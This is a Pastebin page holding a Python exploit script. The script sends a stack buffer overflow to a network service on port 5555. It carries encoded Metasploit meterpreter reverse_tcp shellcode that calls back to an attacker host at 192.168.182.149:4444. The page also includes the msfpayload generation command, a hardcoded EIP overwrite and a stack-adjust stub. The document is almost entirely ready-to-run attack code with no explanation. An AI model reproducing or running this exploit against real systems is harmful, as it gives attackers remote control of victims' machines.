Advertisement
Guest User

Untitled

a guest
Feb 10th, 2013
830
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.49 KB | None | 0 0
  1. import socket
  2. #msfpayload windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.182.149 R |msfencode -e x86/alpha_mixed -b "\x40" -t ruby
  3. #x86/alpha_mixed succeeded with size 641 (iteration=1)
  4. #554 bytes exactly = chunk1
  5. shell = ("\x89\xe0\xd9\xc5\xd9\x70\xf4\x59\x49\x49\x49\x49\x49\x49"
  6. "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a"
  7. "\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
  8. "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
  9. "\x75\x4a\x49\x69\x6c\x6b\x58\x6d\x59\x45\x50\x73\x30\x33"
  10. "\x30\x53\x50\x6c\x49\x49\x75\x35\x61\x78\x52\x72\x44\x4c"
  11. "\x4b\x36\x32\x50\x30\x6c\x4b\x32\x72\x76\x6c\x6c\x4b\x43"
  12. "\x62\x75\x44\x6c\x4b\x73\x42\x34\x68\x64\x4f\x4f\x47\x50"
  13. "\x4a\x45\x76\x75\x61\x39\x6f\x64\x71\x59\x50\x4c\x6c\x55"
  14. "\x6c\x31\x71\x43\x4c\x73\x32\x76\x4c\x57\x50\x6a\x61\x38"
  15. "\x4f\x44\x4d\x56\x61\x79\x57\x4a\x42\x38\x70\x62\x72\x70"
  16. "\x57\x6e\x6b\x73\x62\x54\x50\x4e\x6b\x33\x72\x37\x4c\x76"
  17. "\x61\x6e\x30\x6e\x6b\x63\x70\x51\x68\x6b\x35\x39\x50\x54"
  18. "\x34\x42\x6a\x76\x61\x4e\x30\x36\x30\x6c\x4b\x51\x58\x77"
  19. "\x68\x6c\x4b\x71\x48\x65\x70\x57\x71\x6b\x63\x59\x73\x57"
  20. "\x4c\x73\x79\x4c\x4b\x35\x64\x4c\x4b\x33\x31\x78\x56\x70"
  21. "\x31\x39\x6f\x74\x71\x79\x50\x6c\x6c\x59\x51\x4a\x6f\x56"
  22. "\x6d\x66\x61\x6a\x67\x34\x78\x4d\x30\x72\x55\x4c\x34\x43"
  23. "\x33\x61\x6d\x6b\x48\x75\x6b\x51\x6d\x75\x74\x43\x45\x38"
  24. "\x62\x76\x38\x4c\x4b\x30\x58\x66\x44\x55\x51\x6a\x73\x30"
  25. "\x66\x6c\x4b\x74\x4c\x50\x4b\x6e\x6b\x43\x68\x57\x6c\x37"
  26. "\x71\x39\x43\x4e\x6b\x34\x44\x6e\x6b\x67\x71\x38\x50\x6e"
  27. "\x69\x51\x54\x56\x44\x61\x34\x31\x4b\x61\x4b\x55\x31\x63"
  28. "\x69\x30\x5a\x32\x71\x69\x6f\x69\x70\x31\x48\x31\x4f\x52"
  29. "\x7a\x6c\x4b\x62\x32\x7a\x4b\x6b\x36\x63\x6d\x61\x78\x66"
  30. "\x53\x44\x72\x35\x50\x57\x70\x71\x78\x62\x57\x30\x73\x66"
  31. "\x52\x43\x6f\x71\x44\x50\x68\x50\x4c\x73\x47\x77\x56\x65"
  32. "\x57\x79\x6f\x69\x45\x4d\x68\x7a\x30\x53\x31\x65\x50\x63"
  33. "\x30\x74\x69\x6f\x34\x62\x74\x66\x30\x35\x38\x71\x39\x6d"
  34. "\x50\x70\x6b\x65\x50\x49\x6f\x4a\x75\x62\x70\x62\x70\x46"
  35. "\x30\x72\x70\x51\x50\x56\x30\x31\x50\x36\x30\x65\x38\x6a"
  36. "\x4a\x36\x6f\x6b\x6f\x69\x70\x6b\x4f\x4b\x65\x4e\x77\x33"
  37. "\x5a\x56\x65\x75\x38\x49\x50\x6f\x58\x68\x36\x6e\x75\x52"
  38. "\x48\x77\x72\x73\x30\x56\x71\x51\x4c\x4d\x59\x48\x66\x63"
  39. "\x5a\x46\x70\x61\x46\x51\x47\x71\x78\x4c\x59\x49\x35\x73"
  40. "\x44\x35\x31\x4b\x4f\x6a\x75\x4d\x55\x4b\x70\x30\x74\x76"
  41. "\x6c\x59\x6f\x72\x6e\x76\x68\x72\x55\x7a\x4c\x61\x78\x78"
  42. "\x70\x68\x35\x4c\x62\x52\x76\x4b\x4f\x4b\x65\x52\x4a\x53"
  43. "\x30\x51\x7a\x33\x34\x76\x36\x51\x47\x50\x68\x56\x62\x79"
  44. "\x49\x4b\x78\x63\x6f\x49\x6f\x6a\x75\x4e\x6b\x66\x56\x32"
  45. "\x4a\x73\x70\x32\x48\x33\x30\x44\x50\x55\x50\x55\x50\x51"
  46. "\x46\x50\x6a\x75\x50\x61\x78\x72\x78\x39\x34\x63\x63\x6d"
  47. "\x35\x39\x6f\x49\x45\x4f\x63\x50\x53\x63\x5a\x37\x70\x46"
  48. "\x36\x33\x63\x50\x57\x53\x58\x33\x32\x49\x49\x78\x48\x31"
  49. "\x4f\x49\x6f\x4e\x35\x66\x61\x68\x43\x56\x49\x4f\x36\x4f"
  50. "\x75\x6c\x36\x63\x45\x4a\x4c\x58\x43\x41\x41")
  51.  
  52. shell_chunk1 = shell[:554]
  53. shell_chunk2 = shell[554:]
  54. #0x775e3422
  55. eip = "\x22\x34\x5e\x77"
  56. adjust = "\x81\xc4\x24\xfa\xff\xff"
  57. fill = "A" * (1024 - len(shell_chunk2))
  58. junk = "D" * (10000 - len(shell_chunk2) - len(fill) - len(eip) - len(adjust) - len(shell_chunk1))
  59. buff = shell_chunk2 + fill + eip + adjust + shell_chunk1 + junk
  60.  
  61. print "chunk 1 is " + str(len(shell_chunk1))
  62. print "\nchunk 2 is " + str(len(shell_chunk2))
  63. s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  64. connect=s.connect(('192.168.182.128',5555))
  65. s.send('@F506 '+buff+'@\r\npwnag3\r\n\r\n')
  66. s.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement